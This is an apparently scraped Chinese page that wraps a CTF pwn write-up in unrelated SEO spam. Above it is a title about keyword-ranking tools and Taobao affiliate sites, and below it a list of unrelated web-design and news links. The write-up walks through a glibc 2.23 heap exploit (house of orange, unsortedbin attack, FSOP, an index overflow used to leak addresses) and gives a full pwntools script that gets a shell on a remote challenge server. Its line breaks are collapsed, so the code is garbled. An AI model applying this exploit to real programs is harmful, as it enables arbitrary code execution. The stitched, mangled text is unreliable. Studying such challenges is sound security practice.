当前位置: 首页 > news >正文

网站关键词排名检测工具单页面淘宝客网站

网站关键词排名检测工具,单页面淘宝客网站,搜索引擎推广渠道,个人求职网站怎么做很经典的house of orange unsortedbin attack FSOP 变量覆盖 不能 free,那首先想到就是 house of orange泄露Libc基址,然后unsortedbin attack。 但是只能show(8),就不能用largebin的套路来泄露堆地址了,那怎么办呢? …

很经典的house of orange + unsortedbin attack +FSOP+ 变量覆盖

不能 free,那首先想到就是 house of orange泄露Libc基址,然后unsortedbin attack。

 

但是只能show(8),就不能用largebin的套路来泄露堆地址了,那怎么办呢?

 

我们注意到这是>,但下标一般是从0开始,所以可能会有变量覆盖,我们看看。

 

果然,第33个chunk的size会覆盖第0个chunk地址的最后一字节,所以我们只需要调试一下,就可以通过show(0)泄露堆地址,其他没什么难度,以下是wp:

from pwn import *
context.arch='amd64'
#io=process('./pwn')
elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')
#libc=elf.libc
io=remote('110.40.35.73',33774)def debug():gdb.attach(io)pause()def inter():io.interactive()def add(size,content):io.recvuntil(b">\n")io.sendline(b'1')io.recvuntil(b"Size :\n")io.sendline(str(size).encode())io.recvuntil(b"Content :\n")io.send(content)def edit(idx,size,content):io.recvuntil(b">\n")io.sendline(b'2')io.recvuntil(b"Index :\n")io.sendline(str(idx).encode())io.recvuntil(b"Size :\n")io.sendline(str(size).encode())io.recvuntil(b"Content :\n")io.send(content)def show(idx):io.recvuntil(b">\n")io.sendline(b'3')io.recvuntil(b"Index :\n")io.sendline(str(idx).encode())def delete():io.recvuntil(b"please input:\n")io.sendline(b'2')add(0x30,b'aa')#0
#debug()
edit(0,0x40,b'a'*0x38+p64(0xfc1))
add(0x1000,b'aa')#1
#debug()
add(0x10,b'\x78')#2
show(2)
libc_base=u64(io.recv(8))-0x3c4178
print('libc_base:',hex(libc_base))
#debug()
for i in range(29):add(0x1000,b'aa')
add(0x80,b'\x60')#32
#debug()
show(0)
heap=u64(io.recv(8))-0x60
chunk=heap+0xf0
print('heap:',hex(heap))
system=libc_base+libc.sym['system']
pl=b'a'*(0x10+0x90)
#debug()
vtable=chunk+0xe0
print('vtable:',hex(vtable))
iolist=libc_base+libc.sym['_IO_list_all']
payload=b'/bin/sh\x00'+p64(0x61)+p64(0)+p64(iolist-0x10)
payload+=p64(0)+p64(1)
payload=payload.ljust(0xd8,b'\x00')
payload+=p64(vtable)
payload+=p64(0)*3+p64(system)
print(len(payload))
edit(2,0x300,pl+payload)
#debug()
io.recvuntil(b">\n")
io.sendline(b'0'*0x400+b'1')
io.interactive()

 

http://www.yayakq.cn/news/123306/

相关文章:

  • 宜宾金农投资建设集团网站镇江丹阳
  • 百度包年推广网站建设二级建造师报名时间2022年官网
  • 做网站外国的中国培训网
  • 大姚县建设工程招标网站桂林小学网站建设
  • 苏州网站优化哪家好南宁网站建设制作
  • 够物网站空间100m够不够禄丰网站建设
  • 外贸网站建设视频教程黄石网站建设维护
  • 上海圣品科技 做网站舆情分析网站免费
  • 小企业网站建设的服务机构泰州哪家做网站建设比较好
  • 开一个免费网站网站去哪做
  • 建设400官方网站网页设计教程大全
  • 江门网站建设方案企业做网站哪家公司好
  • 阿里云网站备案电子商务网站开发目标
  • 湖北微网站建设多少钱网络营销以什么为基础
  • 山丹做网站的公司做明信片的网站
  • 网站建设的空间是什么哈尔滨服务专业的建站
  • 商城网站模板 免费电子商务网站建设薛万欣
  • 网站备案大概多久上海新闻综合频道
  • 免费建电子商务网站网站建立电话
  • 开发电商网站多少钱wordpress网站发布
  • 旺道seo网站优化大师宜昌网站模板
  • 电商网站更适合旅游网站手机模板
  • 有没有网站找人帮忙做图佛山专业建设网站平台
  • 上海大规模网站建设平台wordpress创建多个分类目录
  • 如何做招聘网站效果分析网站建设创新成果
  • 51自学网网站开发做招投标应该了解的网站
  • 门户网站的建设公司wordpress 文章归档页面
  • 企业做网站的多吗南山网站 建设seo信科
  • 系统和网站哪个简单一点关于字体设计的网站
  • 更换网站空间宝安电子厂做网站